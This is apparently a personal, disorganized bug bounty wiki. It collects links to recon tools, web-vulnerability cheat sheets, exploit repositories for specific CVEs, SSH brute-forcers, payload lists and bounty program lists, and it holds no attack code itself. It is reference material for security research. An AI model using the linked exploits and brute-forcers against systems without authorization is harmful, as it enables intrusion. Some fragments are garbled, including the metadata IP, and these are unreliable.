https://infosecwriteups.com/reflected-xss-on-microsoft-com-subdomains-4bdfc2c716df\n  https://github.com/danielthatcher/Cookieless-Session-Scanner session is for identifying xss as described here   https://blog.isec.pl/all-is-xss-that-comes-to-the-net/\n\nXSS Labs\nhttps://google-gruyere.appspot.com/\n\n\n\nScreenshots\nhttps://github.com/detectify/page-fetch/fork\n\nEyeballer\nhttps://github.com/BishopFox/eyeballer &lt;----- TODO BIG IG and [this](https://www.kaggle.com/datasets/altf42600/pentest-screensots)\nhttps://www.akamai.com/blog#HTTP2rs\nhttps://www.jhaddix.com/post/tooltime-2-ssl-certificate-parsers-for-recon\nRecon\nNotify -bulk - workflow to funnel everything to Notify https://youtu.be/v7FMPU3J3Qw?t=3044\nReconFTW Automation - https://youtu.be/v7FMPU3J3Qw?t=2841\nAutomation - what to do with all the subdomains  endpoints you found! https://youtu.be/v7FMPU3J3Qw?t=1864\n\nTools\nhttps://reconshell.com/awesome-bug-bounty-tools/\nhttps://reconshell.com/mobile-hackers-weapons/\nhttps://book.hacktricks.xyz/todo/more-tools\nhttps://github.com/fardeen-ahmed/Bug-bounty-Writeups#-bug-bounty-tools---\nhttps://github.com/vavkamil/awesome-bugbounty-tools#Recon\nImage upload\nhttps://github.com/barrracud4/image-upload-exploits\nhttps://hackbotone.com/blog/essential-recon-tools/\nhttps://github.com/danielthatcher/spydom\nhttps://allciber.com/web-attack-cheat-sheet/\n\nAlias / Snippet / Command Management\nhttps://github.com/nahamsec/recon_profile\nhttps://github.com/hahwul/hack-pet/commit/6405608c856551d241174d8c839c79efdff5153c\nhttps://github.com/hahwul/hack-pet\nhttps://github.com/knqyf263/pet\n\n\nhttps://github.com/anshumanbh/brutesubs\nhttps://github.com/VainlyStrain/Vailyn\n\nRECON\nhttps://gist.github.com/khanjanny/039d7c7d825a866b9020e3945e04ace9\nhttps://github.com/KathanP19/HowToHunt\nhttps://prettyrecon.com/auth/forgot_password/\n\nTweets Dorks\nhttps://twitter.com/hashtag/bugbountytips\nhttps://twitter.com/search?q=%23bugbountytips&amp;cn=ZmxleGlibGVfcmVjcw%3D%3D&amp;refsrc=email\nhttps://twitter.com/ghostlulz1337\n\nhttps://www.google.com/search?client=firefox-b-1-d&amp;q=site%3Agist.github.com+%22dalfox%22+automate\nhttps://gist.github.com/sec99\nhttps://gist.github.com/Bedrovelsen/starred\nhttps://gist.github.com/tranphuoctien/47c1242c8189b42fb4d268c548db4526\nhttps://gist.github.com/GrahamcOfBorg/601b9608c6010d9c82cf0e9535faac4b\nhttps://gist.github.com/babaloveyou\nhttps://www.google.com/search?client=firefox-b-1-d&amp;q=bug+bountny+automation\nhttps://www.reddit.com/r/bugbounty/comments/nkaz32/automation_for_bug_bounty_recon_framework/\nhttps://github.com/dirsoooo/Recon\nhttps://gowthams.gitbook.io/bughunter-handbook/automation\n\n\nCrawlers / Crawling\nhttps://github.com/Echocipher/HackeroneSpider\nxnLinkFinde\nhttps://github.com/spatie/crawler\nhttp://www.robotstxt.org/\nhttps://github.com/BruceDone/awesome-crawler\nhttps://github.com/tijme/not-your-average-web-crawler\nhttps://github.com/ghostlulzhacks/crawler\nhttps://scotthelme.co.uk/top-1-million-analysis-march-2020/\n\nhttps://crawler.ninja/\n\n  \n\n\nSqli\n  https://sapt.medium.com/sqli-on-a-bugcrowd-private-program-17858b57ec61\n  http://sqlninja.sourceforge.net/download.html\n  https://w3af.org/howtos/find-cross-site-scripting-and-sql-injections\n  https://www.securedyou.com/how-to-hack-sql-database-password-cracking/\n  https://www.securedyou.com/download-havij-free-automated-sql-injection-tool/\n\nsqlmap\n  https://h1pmnh.github.io/post/advanced-sqlmap-case-study-1\n\nDefault Credentials \nhttps://github.com/Excloudx6/WebCrack\n  The Open Cloud Vulnerability &amp; Security Issue Database  https://www.cloudvulndb.org/\n  \n  https://github.com/SummitRoute/csp_security_mistakes\n  Default Cred Scanner https://github.com/ztgrace/changeme\n  \n\n  \nFile Upload\nhttps://sm4rty.medium.com/hunting-for-bugs-in-file-upload-feature-c3b364fb01ba\nhttps://github.com/almandin/fuxploider - File upload vulnerability scanner and exploitation tool. \n\n\nMonitor Server Status\nhttps://github.com/sudo-jtcsec/server-status-mon\nhttps://github.com/Excloudx6/server-status_PWN\n\nTmux https://github.com/Excloudx6/clips\n# My Bug Bounty Wiki Page\nhttps://github.com/MrM8BRH/SuperLibrary\nhttps://github.com/zeroc00I/ReconNotes\n   https://gist.github.com/ruevaughn/71c31d7f67b7d105d9f480489e02c906\n\n\nA-Z Sorting in progress\nAwsCli https://aws.plainenglish.io/aws-s3-cli-cheatsheet-9078366fca83\nWelcome to my Bug Bounty Wiki page. It's currently not organized or cleaned up at all though that's a WIP. Originally was where I was dumping links and things I needed to rememnber.\nNews Articles\nhttps://www.bbc.com/news/technology-43581624\n\nhttps://bugs.chromium.org/p/project-zero/issues/detail?id=1524\n\nDeserialisation\nDeserialization example &lt;-https://youtu.be/oUAeWhW5b8c?t=1583\nAnother Deserialization example https://youtu.be/eDfGpu3iE4Q?t=266\nhttps://github.com/GerbenJavado/LinkFinder\nhttps://medium.com/@duhroach/how-png-works-f1174e3cc7b7\n\n\nhttps://github.com/beurtschipper/Depix &lt;-- unblur \n\n### A\n\nTwitter\nhttps://mobile.twitter.com/drunkrhin0/status/1344130730947825664\n\n\nhttps://kathmandupost.com/science-technology/2021/04/06/we-dream-to-be-nepal-s-first-billion-dollar-it-company\nhttps://reconwithme.com/\n\nhttps://jaeles-project.github.io/\n\nAPIs\nHuge API Resources list! https://dsopas.github.io/MindAPI/references\nhttps://thexssrat.podia.com/view/courses/free-api-testing-and-securing-guide/923506-api-top-10-videos/2699995-owasp-api-top-10-a0-to-a3\n\nhttps://www.hahwul.com/2019/07/01/easy-security-testing-with-applications-bridge-in-zap/\nhttps://github.com/PortSwigger\n\n### B\nBooks https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/BOOKS.md\nhttps://cheatsheetseries.owasp.org/cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html\nhttps://guidesmiths.github.io/cybersecurity-handbook/resources\nhttps://guidesmiths.github.io/cybersecurity-handbook/tooling\n\n\nhttps://github.com/1N3/Sn1per/blob/master/modes/normal_webporthttp.sh\nBlogs\nhttps://opsecx.com/index.php/category/blog/\n\n\nUrl FInder\nhttps://www.kitploit.com/2021/08/sigurlfind3r-reconnaissance-tool-it.html\n\n403 Bypasser\nhttps://www.kitploit.com/2021/11/4-zero-3-403401-bypass-methods-bash.html\nhttps://www.kitploit.com/2021/09/403bypasser-automates-techniques-used.html\n\nOauth\n#### Oauth Bug Bounty Cheatheet\nhttps://0xn3va.gitbook.io/cheat-sheets/web-application/oauth-2.0-vulnerabilities\nhttps://anil-pace.medium.com/json-web-tokens-vs-oauth-2-0-85dd0b32057d\n\nEmail\nhttps://www.ibm.com/docs/en/sqsp/32.0?topic=SSBRUQ_32.0.0/com.ibm.resilient.doc/install/resilient_install_defang s.htm\n\nNuclei\nNuclei : A Bug Bounty Tool https://www.youtube.com/watch?v=ZcG8ARatgs0\nhttps://www.reddit.com/r/infosec_daily/comments/lrz9bg/nuclei_tool_review/\nFinding bugs with Nuclei with PinkDraconian (Robbe Van Roey) https://www.youtube.com/watch?v=ewP0xVPW-Pk\n\nNuclei templates\nhttps://github.com/xm1k3/cent &lt;-- manage nuclei tempaltes and ibg list of templateseeeeeeeeeeeeeeeeeee\nhttps://github.com/aboul3la/nuclei-templates\nhttps://github.com/projectdiscovery/nuclei-templates/compare/master...s4e-labs:nuclei-templates:master\nhttps://github.com/projectdiscovery/nuclei-templates/discussions/693\nhttps://nuclei-templates.netlify.app/\n\ncool\nhttps://github.com/nikitastupin/param-miner-doc\n\n\nrxrdxrhttps://platforms.disclose.io/\nhttps://cardanofeed.com/cardano-doubled-the-rewards-for-its-bug-bounty-program-49977.html\nhttps://portswigger.net/daily-swig/bug-bounty-radar-the-latest-bug-bounty-programs-for-march-2022\nhttps://portswigger.net/daily-swig/cloudflare-bug-bounty-program-goes-public-with-3-000-rewards-on-offer\n\n\n### C\n\nFuzzing\nhttps://thugcrowd.com/kiosk/ Badass Fuzzing tools / Resources\nhttps://0xn3va.gitbook.io/cheat-sheets/resources/software/fuzzing\n\nBug Bounty Videos\nMix - webpwnized https://www.youtube.com/watch?v=Y_2JVREtDFk&amp;list=RDCMUCPeJcqbi8v46Adk59plaaXg&amp;start_radio=1\nBreaking Parser Logic: Take Your Path Normalization off and Pop 0days Out! - https://www.youtube.com/watch?v=CIhHpkybYsY&amp;t=2s\nVideos\n  HackTube5 Youtube https://www.youtube.com/channel/UCiiEXWVI8XDV_SbIOYVuKog\n  GynvaelEN https://www.youtube.com/user/GynvaelEN\n  Hacktify https://www.youtube.com/channel/UCS82DNnKOhXHcGKxGzQvNSQ\n  Hack the Box Youtube https://www.youtube.com/channel/UCi67lRCd5qpaHwSXNJisuRQ\n  Hackerone https://www.youtube.com/channel/UCsgzmECky2Q9lQMWzDwMhYw\n  Hackersploit https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q\n  Hacking Simplified https://www.youtube.com/channel/UCARsgS1stRbRgh99E63Q3ng\n  Hacking Simplifed (smaller channel) https://www.youtube.com/channel/UCTIHXPYJ4gT7PBQK9tUmFJA\nhttps://administraitor.video/edition/Hack.lu/2019\n\nhttps://portswigger.net/news\n\nNotify - https://youtu.be/rbr7ZmBI9qs?t=278\n\nhttps://www.youtube.com/watch?v=kbi2KaAzTLg\n\nWhat after Recon? - Sup Subdomains?!\n\n\nDORK\n  https://exposingtheinvisible.org/guides/google-dorking/\nhttps://www.google.com/imgres?imgurl=https%3A%2F%2Fpbs.twimg.com%2Fmedia%2FEf6ELytWAAAswXx%3Fformat%3Djpg%26name%3D4096x4096&amp;imgrefurl=https%3A%2F%2Fmobile.twitter.com%2Fbugbountyrecon&amp;tbnid=pQu57Q5pha2WIM&amp;vet=12ahUKEwixtNqk0vz1AhV0IX0KHWddCpQQMygLegUIARC-AQ..i&amp;docid=NghhHzdXU7Ey8M&amp;w=2480&amp;h=1302&amp;q=Bug%20bounty%20automation%20GitHub&amp;client=firefox-b-1-d&amp;ved=2ahUKEwixtNqk0vz1AhV0IX0KHWddCpQQMygLegUIARC-AQ\nhttps://github.com/bughunterlabs/open-bounty-targets/blob/main/dorks.txt\n\nReporting\nhttps://hacktify.in/bugbounty/ &lt;---- lots of resources for reporting\n\n\n#### Ruby on Rails\nhttps://hackerone.com/reports/904059\nhttps://hackerone.com/reports/1400309\nhttps://github.com/httpvoid/writeups/blob/main/Ruby-deserialization-gadget-on-rails.md\nhttps://bugbountyforum.com/resources/#ruby-on-rails\n\nFree Shodan key and nmap automatin script to search for big f5 ip acve\nhttps://learn.hacktify.in/courses/take/bug-bounty-hunting-and-penetration-testing/lessons/16862042-assets-resources\nhttps://github.com/shifa123/f5BigIPExploit/blob/master/assets\ndnmap\nhttps://github.com/vdjagilev/nmap-formatter\nhttps://www.darknet.org.uk/2016/07/dnmap-distributed-nmap-framework/?utm_source=pocket-ff-recs\nhttps://github.com/alt3kx/CVE-2021-21985_PoC/blob/main/CVE-2021-21985.nse\n# https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse\n# https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve2020-3452.nse\naquatone - https://gist.github.com/random-robbie/beae1991e9ad139c6168c385d8a31f7d\nhttps://www.tib.eu/en/publishing-archiving/research-data\nhttps://github.com/erbbysam/Hunting-Certificates-And-Servers/blob/master/Hunting%20Certificates%20%26%20Servers.pdf\nBug Bouty Programs\nhttps://cheatsheetseries.owasp.org/cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html\nhttps://guidesmiths.github.io/cybersecurity-handbook/resources\nhttps://guidesmiths.github.io/cybersecurity-handbook/tooling\n\n\nrxrdxrhttps://platforms.disclose.io/\nhttps://cardanofeed.com/cardano-doubled-the-rewards-for-its-bug-bounty-program-49977.html\nhttps://portswigger.net/daily-swig/bug-bounty-radar-the-latest-bug-bounty-programs-for-march-2022\nhttps://portswigger.net/daily-swig/cloudflare-bug-bounty-program-goes-public-with-3-000-rewards-on-offer\n\nhttps://hackerone.com/alipay?type=team\nhttps://render.alipay.com/p/c/183ecyeztvuo/dana-pay.html\n\nDisclosure Assistance w/ Hackerone https://hackerone.com/disclosure-assistance/disclosure_assistance_requests/new?type=team\n* [Disclose.io - program List Data](https://raw.githubusercontent.com/disclose/diodb/master/program-list.json)\n\nhttps://github.com/detectify/cs-challenge\nhttps://github.com/bughunterlabs/open-bounty-targets/blob/main/dorks.txt\n\nVDP\nDutch Gov - bug bounty scope https://gist.github.com/ruevaughn/f2d1157598a6156c3d51538b3fbd980c\nhttps://www.justice.gov/criminal-ccips/page/file/983996/download\n\"Bug Bounty programs|VDP|launch\" -&gt; Google News etc\n\n\n\n#### J\n\n\n#### L\n\nLabs\n\nLinux\nhttps://linuxsecurity.expert/resources/\n\n#### M\n\nMonitoring\nhttps://github.com/dgtlmoon/changedetection.io Monitor Website Changes\n\n### P\n\n#### Podcasts\nLinks here -&gt; https://blog.intigriti.com/2019/11/12/bug-bytes-44-new-platform-new-programs-and-a-e25k-head-csrf/\nSelfHosted Podcast https://selfhosted.show/60?t=777\n\nPrograms\nhttps://github.com/bughunterlabs/open-bounty-targets/blob/main/dorks.txt\n\n### R\n#### \n#### Reverse Shells\n\n### Rate Limit\n\n\n### T\nTop 10\n\nDNS Hijacking\nhttps://www.cloudflare.com/en-ca/learning/security/global-dns-hijacking-threat/\nhttps://github.com/mdsecresearch/Publications/blob/master/presentations/Offensive%20Development%20-%20Post-Exploitation%20Tradecraft%20in%20an%20EDR%20World%20-%20x33fcon%202020.pdf\n\nIDN Homograph\nhttps://www.akamai.com/blog/security/watch-your-step-the-prevalence-of-idn-homograph-attacks\n\n\n#### Tools\nhttps://www.xmind.net/m/Xy7XEW/# &lt;----- \nhttps://github.com/Excloudx6/PentestTools#exploitation-tools\nhttps://linuxsecurity.expert/security-tools/top-100/\nhttps://intelx.io/tools\nhttps://github.com/nccgroup/ScoutSuite/tree/master/tools\nClean Ips Script\nhttps://gist.github.com/LuD1161/bd4ac4377de548990b47b0af8d03dc78\n### D\nhttps://github.com/nccgroup/tracy\n\n#### Todo\nhetty.xyz\nhttps://www.bugbountyhunting.com/\n    \nhttps://github.com/KingOfBugbounty/KingOfBugBountyTips#scan-log4j-using- -and-log4j-scan\nhttps://medium.com/hacking-info-sec/how-to-install-and-use-bbrf-35f6aa15fbc9\n\nhttps://github.com/Excloudx6/Guide-to-SSRF\nhttps://github.com/alphaSeclab/sec-daily-2020\nhttps://github.com/KathanP19/HowToHunt/blob/master/CheckList/mindmap.png\nhttps://github.com/topics/bugbounty\nhttps://gist.github.com/R0X4R/bc08d55e368965f22c0b41ee8475ba87\nSSRF\nhttps://cheatsheetseries.owasp.org/assets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet_SSRF_Big.pdf\nNmap\nhttps://github.com/killswitch-GUI/PenTesting-Scripts/blob/master/Nmap-Strings\nhttps://www.bugcrowd.com/blog/getting-started-bug-bounty-hunter-methodology/\nhttps://github.com/SmeegeSec/Security_Headers_Nmap_Parser\n\nssh bruting\n A simple multi-threaded distributed SSH brute-forcing tool written in Python  https://github.com/k4yt3x/orbitaldump\nhttps://github.com/d3vilbug/Brutal_SSH\n\nxsshunter\nhttps://github.com/mystech7/xsshunter - duplicate within 15 min check added\n\nhttps://gosecure.github.io/security-cheat-sheet/\n\n\nhttps://twitter.com/e11i0t_4lders0n/status/1489234267687497735\nhttps://snyk.io/log4j-vulnerability-resources/\n\n\n\nhttps://gist.github.com/sminez/571bd7bafb1b88630b85c85a0cd66e3a - grep through this\ntry\nhttps://github.com/arjunshibu/gcmd\n\nhttps://splash.readthedocs.io/en/stable/scripting-tutorial.html#scripting-tutorial\nhttps://github.com/phlmox\n\nRecon\n  https://github.com/Viralmaniar/BigBountyRecon\nhttps://www.kitploit.com/2021/10/webdiscover-purpose-of-this-script-is.html\nhttps://www.cobalt.io/blog/scope-based-recon-smart-recon-tactics\n\nChecklists\nhttps://gist.github.com/jhaddix/6b777fb004768b388fefadf9175982ab\nhttps://github.com/KathanP19/HowToHunt/blob/master/CheckList/Web_Checklist_by_Chintan_Gurjar.pdf\nhttps://blog.assetnote.io/2021/01/13/blind-ssrf-chains/\nhttps://gist.github.com/pdelteil/ba005609789ae14862f023da4191826d\nhttps://github.com/rails/rails/issues/37620\nSUBDOMAIN TAKEOVERS\nhttps://kathan19.gitbook.io/howtohunt/subdomain-takeover/easy_methods\nhttps://www.udemy.com/course/cloud-hacking/learn/lecture/8613164?start=0#overview\nhttps://github.com/indianajson/can-i-take-over-dns\n\n\nhttps://scotthelme.co.uk/top-1-million-analysis-march-2020/\n\nFINISH Watching - https://www.youtube.com/watch?v=12gtkYbMGd4&amp;t=362s\nHARSHBROTHA - https://www.youtube.com/watch?v=UrdvDCb4Gz8\nNOTIFY - https://www.youtube.com/watch?v=rbr7ZmBI9qs\nHandle your data carefully https://www.y\noutube.com/watch?v=rbr7ZmBI9qs\n\nUserAgents\nhttps://github.com/Shaked/user-agents\nhttps://github.com/BbhunterOne/ReconChef/blob/main/recon.sh#L82\n\nScreenshots\nhttps://github.com/spatie/browsershot\n# https://github.com/maaaaz/webscreenshot\nhttps://random-robbie.github.io/bugbounty-scans/\nhttps://buaq.net/go-99375.html\nhttps://stackoverflow.com/questions/5258977/are-http-headers-case-sensitive?rq=1\n\ncheatsheets\nhttps://0xn3va.gitbook.io/cheat-sheets/\nhttps://0xn3va.gitbook.io/cheat-sheets/web-application/http-request-smuggling\n   _   _   _   _   _   _   _   _   _   _  \n  / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ \n ( F | R | A | M | E | W | O | R | K | S )\n  \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \n\n+ ------ +\n |Articles|\n + ------ +\n\n* E.crack jwt - https://github.com/brendan-rius/c-jwt-cracker\n\nhttps://github.com/SecureAuthCorp/impacket\nNeo4j vs postgres (graphdb)\nhttps://edoverflow.com/2019/ci-knew-there-would-be-bugs-here/\n\nAutomation script \nhttps://www.benteveo.kiwi/blog/automating-bug-bounties\nhttps://github.com/AlexisAhmed/BugBountyToolkit &lt;-- docker \nhttps://gowthams.gitbook.io/bughunter-handbook/automation\n\n\nSecret\nhttps://www.directdefense.com/csrf-in-the-age-of-json/\n\nhttps://buaq.net/go-249.html\n\nIntentionally Vulnerable Github repo\nhttps://github.com/shifa123/githubleak\n\nhttps://wiki.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contentsfff\nhttps://pentestbook.six2dez.com/\nhttps://github.com/m4ll0k\nhttps://github.com/six2dez\nhttps://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter\nhttps://github.com/shifa123\nhttps://www.udemy.com/course/web-application-ethical-hacking/learn/lecture/3305350?start=0#overview\n\n## BugBounty Programs\n---\nhttps://huntr.dev/\nhttps://www.zerodayinitiative.com/\nhttps://greedybucks.medium.com/bug-bounty-programs-beginners-should-try-fe51cebe52a5\nhttps://opensourcelibs.com/lib/google-acquisitions\nhttps://opensourcelibs.com/libs/bugbounty\nList of .gov\n\nTatget crypto https://arlolra.github.io/otr/\nhttps://github.com/cisagov/dotgov-data\n[FireBounty](https://firebounty.com) The Ultimate Vulnerability Disclosure Program. FireBounty, aggregate your bounty.\n[Disclose.io](https://disclose.io/programs/) We're here to make vulnerability disclosure safe, simple, and standardized for everyone.\n[Security Ninja txt valuess list](https://crawler.ninja/files/security-txt-values.txt)\n[Security Ninja Files List](https://crawler.ninja/files/)\n\nhttps://allabouttesting.org/\n\nTodo:\nhttps://boards.greenhouse.io/cobaltio/jobs/4141074002 &lt;--- solve challenge\n\n\nCheatSheets\nhttps://github.com/six2dez/bitup2021_subdominions/blob/main/Cheatsheet.md\n\n\n\n\nAutomated Scanners\n\n* [Zeus-Scanner](https://github.com/Ekultek/Zeus-Scanner)\n* [Dalfox](https://github.com/hahwul/dalfox)\n* [XSSTrike](https://github.com/s0md3v/XSStrike)\n* [SSTI-xssfinder](https://awesomeopensource.com/project/darklotuskdb/SSTI-XSS-Finder?categoryPage=47)\n\n[SSTI-XSS-Finder](https://github.com/darklotuskdb/SSTI-XSS-Finder)\n  * [Learn with @DarkLotusKDB: Recon with Shodan &amp; Spyse,XSS, Bypass OpenRedirects, SSRF, BugBunty Bot!!!](https://www.youtube.com/watch?v=66HqaFCF4Kk)\n  * https://twitter.com/0xJin/status/1470748925963513863\n  * https://twitter.com/0xJin/status/1470748925963513863/photo/1\n\n\nXXE\nhttps://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity\nhttps://app.intigriti.com/programs/dpgm/libelle/detail\nhttps://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html\nhttps://twitter.com/infosec_au/status/1340785029899698181?lang=en\nhttps://web-in-security.blogspot.com/2014/11/detecting-and-exploiting-xxe-in-saml.html\n\nUnderstanding DTD-&lt; https://web-in-security.blogspot.com/2014/11/detecting-and-exploiting-xxe-in-saml.html\n\n\n## Owasp Top 10\n---\nhttps://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/WhatsNew.html\n### Clickjacking\nhttps://lcamtuf.blogspot.com/2011/12/x-frame-options-or-solving-wrong.html\nhttps://blog.innerht.ml/page/2/\nhttps://hackerone.com/reports/8724\n\n### CSRF\n    * https://hackerone.com/reports/44146\n   - 7-19-16 \n     * [CSRF attack on paypal.me](https://www.youtube.com/watch?v=RjS47ojRQXk&amp;t=5s)\n     * https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/\n   - 01-18-15 https://hackerone.com/reports/44146(Make API calls on behalf of another user (CSRF protection bypass))\n### XSS\n\nPaid Services\nhttps://findomain.app/#Pricing\n\n## Resources\n---\n\n\nParams\nConfig override using non-validated query parameter allows at least reflected XSS by injecting configuration into state \nhttps://hackerone.com/reports/1082847\n\nFuzzcon &amp; fuzzung\nhttps://twitter.com/hashtag/hacklu?src=hashtag_click\nhttps://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Fuzzing.md\n\nRecoon \neiIaaefwaaa m\nk\n- https://kathan19.gitbook.io/howtohunt/sensitive-info-leaks/shodan_cve_dorks\n\n[PrettyRecon](https://prettyrecon.com/auth/signup)\n\n### Dorks\nhttps://ask.fm/tags/bounty\n\n### Lists\nhttps://github.com/payloadbox/xss-payload-list\n\nProtips and Trips\nMost of the sites use AWS nowadays...\n  AWS localhost is 169.254.169.2qqqd eede                                   4bs.com/2017/02/wallpaper-penetration-testing-and-exploit-dev-cheatsheet/\n\nhttps://githubhelp.com/topic/bugbountytips\n\n\nGithubs\nhttps://github.com/kleiton0x00?tab=stars\nhttps://github.com/fuzz-security\n\n---\n\n  - [Book of secret knowledge](https://github.com/ruevaughn/the-book-of-secret-knowledge)\n  - [Disclose/diodb](https://github.com/disclose/diodb)\n  -\n\n### Streams\n[Nehamsec Twitch](https://www.twitch.tv/nahamsec)\n\n### Twitter Tweetin'\nhttps://twitter.com/0xMstar/status/1464658472981565444{{\nhttps://twitter.com/0xJin/status/1470748925963513863\n\npodcasts\nhttps://open.spotify.com/episode/2VaH6DgbghMEiaimqdxq4Q\n### Data\n---\nBugcrowd Subdomain Enumeration https://www.youtube.com/watch?v=La3iWKRX-tE\n\n\nCVE-2019-11510 Detail \n/dana-na\n\n## CVE/CVD\n---\n\nCVE [2020-3452](https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter)xx\n\n- https://vuls.cert.org/confluence/display/CVD/Executive+Summary\n- https://vuls.cert.org/confluence/display/CVD/Sightings\n\n\n\n\n\nhttps://github.com/detectify/cs-challenge\nhttps://github.com/r3curs1v3-pr0xy\n\nhttps://notsosecure.com/resources\nhttps://reconshell.com/bug-bounty-tips/\n\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Subdomains%20Enumeration.md\n[Insecure Deserialization Part 1](https://www.youtube.com/watch?v=SNi7gNkfLSM)\n[Insecure Deserialization part 3](https://www.youtube.com/watch?v=icAKHE-iKOs)\n\nhttps://secoceans.com/blog-2/\nhttps://portswigger.net/research\nhttps://portswigger.net/blog\nhttps://portswigger.net/news\nhttps://portswigger.net/daily-swig\n\n\ncourses\nhttps://www.udemy.com/course/penetration-testing-bug-bounty-hunting-level-2-hacktify/\n\n\n\n\nhttps://spongebhav.medium.com/facebook-group-members-disclosure-e53eb83df39e\nhttps://github.com/six2dez/talks/blob/main/Gotta_ENG.pdf\n\n\n\npackets\nhttps://www.kitploit.com/2018/08/polymorph-real-time-network-packet.html\n\n\nAutomation\nhttps://gowthams.gitbook.io/bughunter-handbook/automation\n[Automated subdomain scanning with Findomain, PostgreSQL and Webhooks](https://medium.com/heck-the-packet/automated-subdomain-scanning-with-findomain-postgresql-and-webhooks-3e74ce9b5372)\n\n\n\nhttps://pentestbook.six2dez.com/\nhttps://github.com/m4ll0k\nhttps://github.com/six2dez\nhttps://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter\nhttps://github.com/shifa123\n\nWriteups\n\n\n## BugBounty Programs\n---\n\nhttps://greedybucks.medium.com/bug-bounty-programs-beginners-should-try-fe51cebe52a5\nhttps://opensourcelibs.com/lib/google-acquisitions\nhttps://opensourcelibs.com/libs/bugbounty\nList of .gov\nhttps://github.com/cisagov/dotgov-data\n[FireBounty](https://firebounty.com) The Ultimate Vulnerability Disclosure Program. FireBounty, aggregate your bounty.\n[Disclose.io](https://disclose.io/programs/) We're here to make vulnerability disclosure safe, simple, and standardized for everyone.\n[Security Ninja txt valuess list](https://crawler.ninja/files/security-txt-values.txt)\n[Security Ninja Files List](https://crawler.ninja/files/)\n\nhttps://allabouttesting.org/\n\n\nCheatSheets\nhttps://github.com/six2dez/bitup2021_subdominions/blob/main/Cheatsheet.md\n\n### Z\n\nZap\nhttps://github.com/sepehrdaddev/zap-scripts/fork\nhttps://www.zaproxy.org/authors/thorin/\nhttps://github.com/zaproxy/zap-extensions\n\n\n\nFrameworks\nhttps://core.intrigue.io/\nReconness\nPwnmachine\naxiom\nhttps://www.mandiant.com/\nhttps://trickest.com/\n\n(https://github.com/Findomain/Findomain/releases)\n*   [Configuing Findomain](https://www.youtube.com/watch?v=Wpm2C1LD9ns)\n*   https://github.com/findomain/findomain/blob/master/README.md#subdomains-monitoring\n\nAutomated Scanners\n\n* [Zeus-Scanner](https://github.com/Ekultek/Zeus-Scanner)\n* [Dalfox](https://github.com/hahwul/dalfox)\n* [XSSTrike](https://github.com/s0md3v/XSStrike)\n* [SSTI-xssfinder](https://awesomeopensource.com/project/darklotuskdb/SSTI-XSS-Finder?categoryPage=47)\n\n\n\nhttps://github.com/darklotuskdb/SSTI-XSS-Finder\n  * [Learn with @DarkLotusKDB: Recon with Shodan &amp; Spyse,XSS, Bypass Op enRed irects, SSRF, BugBunty Bot!!!](https://www.youtube.com/watch?v=66HqaFCF4Kk)\n  * https://twitter.com/0xJin/status/1470748925963513863\n  * https://twitter.com/0xJin/status/1470748925963513863/photo/1\n\n\n## Owasp Top 10\n---\n\n### Clickjacking\nhttps://hackerone.com/reports/8724\n\n### CSRF\n    * https://hackerone.com/reports/44146\n   - 7-19-16 \n     * [CSRF attack on paypal.me](https://www.youtube.com/watch?v=RjS47ojRQXk&amp;t=5s)\n     * https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/\n   - 01-18-15 https://hackerone.com/reports/44146(Make API calls on behalf of another user (CSRF protection bypass))\n### XSS\n\nPaid Services\nhttps://findomain.app/#Pricing\n\n## Resources\n---\n[Automated subdomain scanning with Findomain, PostgreSQL and Webhooks](https://medium.com/heck-the-packet/automated-subdomain-scanning-with-findomain-postgresql-and-webhooks-3e74ce9b5372)\n How to view someones IP address and connection speed! https://www.youtube.com/watch?v=SXmv8quf_xM\nRecoon \neiIaaefwaaa m\nk\n- https://kathan19.gitbook.io/howtohunt/sensitive-info-leaks/shodan_cve_dorks\n\n[PrettyRecon](https://prettyrecon.com/auth/signup)\n\n### Dorks\nhttps://ask.fm/tags/bounty\n\n### Lists\nhttps://github.com/payloadbox/xss-payload-list\n\n### Githubs\n---\n\n  - [Book of secret knowledge](https://github.com/ruevaughn/the-book-of-secret-knowledge)\n  - [Disclose/diodb](https://github.com/disclose/diodb)\n  -\n\nActive Directory\nPenttesting Active Directory https://www.xmind.net/m/5dypm8/a\nhttps://adsecurity.org/\n\n### Streams\n[Nehamsec Twitch](https://www.twitch.tv/nahamsec)\nLive Bug Bounty Hunting Speedbiker https://www.youtube.com/watch?v=9W94AKLc5g8\nWatch Live [Current] https://www.youtube.com/c/Ch1R0n1n\n### Twitter Tweetin'\nhttps://twitter.com/samwcyo/status/1529888063576584202\nhttps://twitter.com/sshell_\nhttps://mobile.twitter.com/TechnoTimLive Devops tweets\nhttps://mobile.twitter.com/drunkrhin0/status/1344130729320435712\nhttps://twitter.com/0xMstar/status/1464658472981565444{{\nhttps://twitter.com/0xJin/status/1470748925963513863\n\npodcasts\nhttps://open.spotify.com/episode/2VaH6DgbghMEiaimqdxq4Q\n### Data\n---\n\n* [Disclose.io - program List Data](https://raw.githubusercontent.com/disclose/diodb/master/program-list.json)\n\nCVE-2019-11510 Detail \n/dana-na\n\n## CVE/CVD\n---\n\nCVE [2020-3452](https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter)xx\n\n- https://vuls.cert.org/confluence/display/CVD/Executive+Summary\n- 